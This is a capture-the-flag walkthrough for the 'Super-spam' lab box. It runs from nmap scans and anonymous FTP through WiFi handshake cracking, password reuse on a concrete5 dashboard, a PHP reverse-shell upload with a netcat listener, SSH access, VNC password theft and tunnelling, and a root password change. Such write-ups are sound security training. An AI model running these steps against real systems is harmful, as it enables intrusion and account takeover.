Super-spam CTF About
General Uvilix:
Good Morning! Our intel tells us that he has returned. Super-spam, the evil alien villain from the planet Alpha Solaris IV from the outer reaches of the Andromeda Galaxy. He is a most wanted notorious cosmos hacker who has made it his lifetime mission to attack every Linux server possible on his journey to a Linux-free galaxy. As an avid Windows proponent, Super-spam has now arrived on Earth and has managed to hack into OUR Linux machine in pursuit of his ultimate goal. We must regain control of our server before it’s too late! Find a way to hack back in to discover his next evil plan for total Windows domination! Beware, super-spam’s evil powers are to confuse and deter his victims.
Super-Spam Recon
Nmap :- Output
nmap -sCV -T4 10.10.111.160
Starting Nmap 7.92 ( https://nmap.org ) at 2022–05–27 10:03 IST
Nmap scan report for 10.10.111.160
Host is up (0.29s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http?
5901/tcp open vnc VNC (protocol 3.8)
| vnc-info:
| Protocol version: 3.8
| Security types:
| VNC Authentication (2)
| Tight (16)
| Tight auth subtypes:
|_ STDV VNCAUTH_ (2)
6001/tcp open X11 (access denied)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 281.62 seconds
All Port Scan
nmap -sCV -T4 -p- 10.10.14.182
Starting Nmap 7.92 ( https://nmap.org ) at 2022–05–27 10:54 IST
Nmap scan report for 10.10.14.182
Host is up (0.26s latency).
Not shown: 65530 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
4012/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 86:60:04:c0:a5:36:46:67:f5:c7:24:0f:df:d0:03:14 (RSA)
| 256 ce:d2:f6:ab:69:7f:aa:31:f5:49:70:e5:8f:62:b0:b7 (ECDSA)
|_ 256 73:a0:a1:97:c4:33:fb:f4:4a:5c:77:f6:ac:95:76:ac (ED25519)
4019/tcp open ftp vsftpd 3.0.3
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.8.85.106
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.3 — secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| drwxr-xr-x 2 ftp ftp 4096 Feb 20 2021 IDS_logs
|_-rw-r — r — 1 ftp ftp 526 Feb 20 2021 note.txt
5901/tcp open vnc VNC (protocol 3.8)
| vnc-info:
| Protocol version: 3.8
| Security types:
| VNC Authentication (2)
| Tight (16)
| Tight auth subtypes:
|_ STDV VNCAUTH_ (2)
6001/tcp open X11 (access denied)
Service Info: OSs: Linux, Unix; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1493.73 seconds
FTP Port 4019
List all files:-
ftp 10.10.14.182 4019
Connected to 10.10.14.182.
220 (vsFTPd 3.0.3)
Name (10.10.14.182:root): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -a
229 Entering Extended Passive Mode (|||45021|)
150 Here comes the directory listing.
drwxr-xr-x 4 ftp ftp 4096 May 30 2021 .
drwxr-xr-x 4 ftp ftp 4096 May 30 2021 ..
drwxr-xr-x 2 ftp ftp 4096 May 30 2021 .cap
drwxr-xr-x 2 ftp ftp 4096 Feb 20 2021 IDS_logs
-rw-r — r — 1 ftp ftp 526 Feb 20 2021 note.txt
226 Directory send OK.
ftp>
show .cap directory IDS_logs Directory and note.txt file
• note.txt
ftp> more note.txt
12th January: Note to self. Our IDS seems to be experiencing high volumes of unusual activity.
We need to contact our security consultants as soon as possible. I fear something bad is going
to happen. -adam
13th January: We’ve included the wireshark files to log all of the unusual activity. It keeps
occuring during midnight. I am not sure why.. This is very odd… -adam
15th January: I could swear I created a new blog just yesterday. For some reason it is gone… -adam
24th January: Of course it is… — super-spam :)
ftp>
IDS_logs Directory files:-
-rw-r — r — 1 ftp ftp 14132 Feb 20 2021 12–01–21.req.pcapng
-rw-r — r — 1 ftp ftp 0 Feb 20 2021 13–01–21-spammed.s
-rw-r — r — 1 ftp ftp 0 Feb 20 2021 13–01–21-spammed010.s
-rw-r — r — 1 ftp ftp 0 Feb 20 2021 13–01–21-spammed013.s
-rw-r — r — 1 ftp ftp 0 Feb 20 2021 13–01–21-spammed01h3.s
-rw-r — r — 1 ftp ftp 0 Feb 20 2021 13–01–21-spammed01ha.s
-rw-r — r — 1 ftp ftp 0 Feb 20 2021 13–01–21-spammed50n0.c
-rw-r — r — 1 ftp ftp 0 Feb 20 2021 13–01–21-spammed50n0.t
-rw-r — r — 1 ftp ftp 0 Feb 20 2021 13–01–21-spammed6.s
-rw-r — r — 1 ftp ftp 0 Feb 20 2021 13–01–21-spammed806.s
-rw-r — r — 1 ftp ftp 0 Feb 20 2021 13–01–21-spammed810.s
-rw-r — r — 1 ftp ftp 0 Feb 20 2021 13–01–21-spammed816.s
-rw-r — r — 1 ftp ftp 0 Feb 20 2021 13–01–21-spammed86.s
-rw-r — r — 1 ftp ftp 0 Feb 20 2021 13–01–21-spammeda1ha.s
-rw-r — r — 1 ftp ftp 0 Feb 20 2021 13–01–21-spammedabha.s
-rw-r — r — 1 ftp ftp 74172 Feb 20 2021 13–01–21.pcap
-rw-r — r — 1 ftp ftp 0 Feb 20 2021 14–01–21-spammed22n0.s
………………………………….
………………………………….
-rw-r — r — 1 ftp ftp 0 Feb 20 2021 spammed9.s
• Download the file inside .cap directory
Network analysis
Based on packets seems like, WIFI traffic captured for “Wi-Fi Hacking” I’ll be using aircrack-ng for bruteforce.
• traffic
- Bruteforce for
Wi-Fipassword!
So this confirms that this is a file containing WIFI handshake. We can crack the password of the wifi withaircrack-ngor by converting this file to hashcat's format of cracking WPA2 passwords
• command:- aircrack-ng SamsNetwork.cap -w /usr/share/wordlists/rockyou.txt
• no use for it so far
http port 80
WebPage:-
• there is a /blog directory, let’s find all users there
- usernames:
◇ benjamin_blogger
◇ adam_admin
◇ donald_dump
◇ lucy_Loser
• now we have 4 possible usernames and 1 passowrd, let’s check out our golden password resuse policy(password reuse is not a good idea!)
Bruteforce
◇ turns out, bruteforce is a bad idea, there is a csrf token and I’m lazy. anyways there are only 4 usernames & 1 password combo. I can do it manually!
◇ and it worked!!
- Click http://10.10.216.44/concrete5/index.php/dashboard
• seems like we can now edit pages and there is a nice little manage/setting button
- Click files button
Allow Filed Type Change
- Click File Button adn finally a upload option, I’ll be using php reverse shell to getinto the box
Uploading backdoor
- Drag and Drop File and Close
• start a listener
• curl/access the php file on webserver & get the access
Command:- curl http://10.10.216.44/concrete5/application/files/3116/5372/1953/php-reverse-shell.php
nc -lvnp 4444
listening on [any] 4444 …
connect to [10.8.85.106] from (UNKNOWN) [10.10.216.44] 46692
Linux super-spam 4.15.0–140-generic #144-Ubuntu SMP Fri Mar 19 14:12:35 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
07:17:44 up 15 min, 1 user, load average: 0.02, 0.53, 0.78
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root pts/0 :1 07:04 13:28 0.00s 0.00s sh
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can’t access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$
• TTY Shell Upgrade
python3 -c “import pty;pty.spawn(‘/bin/bash’)”
• home directory
www-data@super-spam:/$ ls -la /home
ls -la /home
total 28
drwxr-xr-x 7 root root 4096 Feb 20 2021 .
drwxr-xr-x 22 root root 4096 Apr 9 2021 ..
drwxr-xr-x 2 benjamin_blogger benjamin_blogger 4096 Apr 9 2021 benjamin_blogger
drw-rw — — 6 donalddump donalddump 4096 Apr 9 2021 donalddump
drwxr-xr-x 7 lucy_loser lucy_loser 4096 Apr 9 2021 lucy_loser
drwxr-xr-x 5 root root 4096 May 30 2021 personal
drwxr-xr-x 4 super-spam super-spam 4096 Apr 9 2021 super-spam
www-data@super-spam:/$
• Got the User Flag
www-data@super-spam:/home/personal/Work$ cat flag.txt
flag{-eteKc=skineogyls45«ey?t+du8}
We are in! We locate a directory that contains a xored.py file, a note, and ten .png files. It looks like they used a XOR-based encryption function to embed the picture files with a secret message. Let’s download this for more analysis:
www-data@super-spam:/home/lucy_loser/.MessagesBackupToGalactic$ ls -la
ls -la
total 1720
drwxr-xr-x 2 lucy_loser lucy_loser 4096 May 30 2021 .
drwxr-xr-x 7 lucy_loser lucy_loser 4096 Apr 9 2021 ..
-rw-r — r — 1 lucy_loser lucy_loser 172320 Apr 8 2021 c1.png
-rw-r — r — 1 lucy_loser lucy_loser 171897 Apr 8 2021 c10.png
-rw-r — r — 1 lucy_loser lucy_loser 168665 Apr 8 2021 c2.png
-rw-r — r — 1 lucy_loser lucy_loser 171897 Apr 8 2021 c3.png
-rw-r — r — 1 lucy_loser lucy_loser 171462 Apr 8 2021 c4.png
-rw-r — r — 1 lucy_loser lucy_loser 167772 Apr 8 2021 c5.png
-rw-r — r — 1 lucy_loser lucy_loser 167772 Apr 8 2021 c6.png
-rw-r — r — 1 lucy_loser lucy_loser 171462 Apr 8 2021 c7.png
-rw-r — r — 1 lucy_loser lucy_loser 171734 Apr 8 2021 c8.png
-rw-r — r — 1 lucy_loser lucy_loser 173994 Apr 8 2021 c9.png
-rw-r — r — 1 lucy_loser lucy_loser 20987 Apr 8 2021 d.png
-rw-r — r — 1 lucy_loser lucy_loser 497 May 30 2021 note.txt
-rw-r — r — 1 lucy_loser lucy_loser 1200 Apr 8 2021 xored.py
www-data@super-spam:/home/lucy_loser/.MessagesBackupToGalactic$ cat note.txt
cat note.txt
Note to self. General super spam mentioned that I should not make the same mistake again of re-using the same key for the XOR encryption of our messages to Alpha Solaris IV’s headquarters, otherwise we could have some serious issues if our encrypted messages are compromised. I must keep reminding myself,do not re-use keys,I have done it 8 times already!.The most important messages we sent to the HQ were the first and eighth message.I hope they arrived safely.They are crucial to our end goal.
www-data@super-spam:/home/lucy_loser/.MessagesBackupToGalactic$
wget -r command. The -r flag (recursive) allows you to download every file in a dir from a remote target. Great to use with a python -m http.server running on the target in the dir you want to download.
• Run Victime Machine
www-data@super-spam:/home/lucy_loser/.MessagesBackupToGalactic$ python3 -m http.server
<r/.MessagesBackupToGalactic$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) …
Download all files
wget -r http://10.10.216.44:8000
Once all files are downloaded to our box, we open the .png files. In one of them you can make out a message with a password: This password turns out to be user:donalddump’s ssh login passwd. We determine this by trying each (4) of our blog usernames against it, while trying to connect via ssh:
• we got a xored.py script. let’s use it to decrypt the msg.
• It requires 2 png files. After trying a lot i found out c2.png and c8.png worked
• Command :- python3 xored.py
[!] Note Add extention also.
[-] Enter First Image: c2.png
[-] Enter Second Image: c8.png
[-] Enter Name of The output image:out.png
[+] Reading pic1
[+] Reading pic2
<PIL.PngImagePlugin.PngImageFile image mode=RGB size=440x227 at 0x7F3C51576A30>
[+] Xored successfully
[+] Successfully saved as out.png
- Open .png image
• Login SSH for donalddump User
ssh donalddump@10.10.12.91 -p 4012 130 ⨯
The authenticity of host ‘[10.10.12.91]:4012 ([10.10.12.91]:4012)’ can’t be established.
ED25519 key fingerprint is SHA256:n+Oq7PHkf5ldKeaXZjejkz2mr1P5P/sunBU2bCcHaiI.
This host key is known by the following other names/addresses:
~/.ssh/known_hosts:361: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added ‘[10.10.12.91]:4012’ (ED25519) to the list of known hosts.
donalddump@10.10.12.91’s password:
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0–140-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Sun May 29 05:23:14 UTC 2022
System load: 0.39 Processes: 103
Usage of /: 26.7% of 19.56GB Users logged in: 1
Memory usage: 74% IP address for eth0: 10.10.12.91
Swap usage: 0%
* Super-optimized for small spaces — read how we shrank the memory
footprint of MicroK8s to make it the smallest full K8s around.
https://ubuntu.com/blog/microk8s-memory-optimisation
71 packages can be updated.
0 of these updates are security updates.
To see these additional updates run: apt list — upgradable
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
Could not chdir to home directory /home/donalddump: Permission denied
-bash: /home/donalddump/.bash_profile: Permission denied
donalddump@super-spam:/$ cd
-bash: cd: /home/donalddump: Permission denied
donalddump@super-spam:/$
• Permission denied — Lets try to change the permissions of the — chmod 777 /home/donalddump
☐ Privilege Escalation
Now we remember we had VNCviewer running as we found in our nmap scan.
Lets try to gain root using that
Grab VNC passwd file from donaldump’s directory
donalddump@super-spam:~$ ls -la
total 44
drwxrwxrwx 6 donalddump donalddump 4096 Apr 9 2021 .
drwxr-xr-x 7 root root 4096 Feb 20 2021 ..
lrwxrwxrwx 1 root root 9 Apr 9 2021 .bash_history -> /dev/null
-rw-r — r — 1 donalddump donalddump 220 Feb 20 2021 .bash_logout
-rw-r — r — 1 donalddump donalddump 3771 Feb 20 2021 .bashrc
drwx — — — 2 donalddump donalddump 4096 Apr 8 2021 .cache
drwx — — — 3 donalddump donalddump 4096 Apr 8 2021 .gnupg
drwxr-xr-x 2 root root 4096 Feb 24 2021 morning
drwxr-xr-x 2 root root 4096 Feb 24 2021 notes
-rw-r — r — 1 root root 8 Apr 8 2021 passwd
-rw-r — r — 1 donalddump donalddump 807 Feb 20 2021 .profile
-rw-rw-r — 1 donalddump donalddump 36 Apr 9 2021 user.txt
donalddump@super-spam:~$
Transfer this using python3 -m http.server
On your machine - wget ip:8000/passwd
Do port forwarding with ssh as you know donald_dump's password
ssh -L 5901:127.0.0.1:5901 donalddump@10.10.12.91 -p 4012
donalddump@10.10.12.91's password:
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-140-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Sun May 29 05:33:42 UTC 2022
System load: 0.0 Processes: 104
Usage of /: 26.7% of 19.56GB Users logged in: 2
Memory usage: 74% IP address for eth0: 10.10.12.91
Swap usage: 0%
71 packages can be updated.
0 of these updates are security updates.
To see these additional updates run: apt list --upgradable
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Sun May 29 05:23:34 2022 from 10.8.85.106
donalddump@super-spam:~$
Note : Make sure you have VNCviewer installed, if not please install it using this
Or install it using: sudo apt install tigervnc-viewer
Run - vncviewer -passwd passwd_file ip::5901 on your machine.
• passwd_file was the one we transfered from Superspam to our machine which was in the donalddump home directory.
Let's change the root password and then log in as root from sshpasswd
# passwd
Enter new UNIX password:
Retype new UNIX password:
passwd: password updated successfully
It's Login Root User
donalddump@super-spam:~$ su -
Password:
root@super-spam:~# cd ~
root@super-spam:~# ls -la
total 76
drwx------ 8 root root 20480 May 29 05:18 .
drwxr-xr-x 22 root root 4096 Apr 9 2021 ..
lrwxrwxrwx 1 root root 9 Apr 9 2021 .bash_history -> /dev/null
-rw-r--r-- 1 root root 3106 Apr 9 2018 .bashrc
drwx------ 2 root root 4096 Feb 19 2021 .cache
drwx------ 3 root root 4096 Feb 19 2021 .gnupg
drwxr-xr-x 3 root root 4096 Feb 19 2021 .local
-rw------- 1 root root 969 May 29 2021 .mysql_history
drwxr-xr-x 2 root root 4096 Feb 24 2021 .nothing
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw-r--r-- 1 root root 66 Apr 8 2021 .selected_editor
drwx------ 2 root root 4096 Feb 19 2021 .ssh
-rw------- 1 root root 0 May 29 2021 .viminfo
drwx------ 2 root root 4096 May 29 05:18 .vnc
-rw-r--r-- 1 root root 208 Apr 9 2021 .wget-hsts
-rw------- 1 root root 642 May 29 05:18 .Xauthority
-rw------- 1 root root 1368 Apr 8 2021 .xsession-errors
root@super-spam:~#cd .nothing/
root@super-spam:~/.nothing# ls
r00t.txt
root@super-spam:~/.nothing# cat r00t.txt
what am i?: MZWGCZ33NF2GKZKLMRRHKPJ5NBVEWNWCU5MXKVLVG4WTMTS7PU======
KRUGS4ZANFZSA3TPOQQG65TFOIQSAWLPOUQG2YLZEBUGC5TFEBZWC5TFMQQHS33VOIQGEZLMN53GKZBAOBWGC3TFOQQHI2DJOMQHI2LNMUWCASDBMNVWK4RNNVQW4LBAMJ2XIICJEB3WS3DMEBRGKIDCMFRWWIDXNF2GQIDBEBRGSZ3HMVZCYIDNN5ZGKIDEMFZXIYLSMRWHSIDQNRQW4IDUN4QGOZLUEBZGSZBAN5TCA5DIMF2CA2LOMZSXE2LPOIQG64DFOJQXI2LOM4QHG6LTORSW2LBAJRUW45LYFYQA====
root@super-spam:~/.nothing#
Enconding base32 :- MZWGCZ33NF2GKZKLMRRHKPJ5NBVEWNWCU5MXKVLVG4WTMTS7PU======
Root Flag
flag{iteeKdbu==hjK6§YuUu7-6N_}
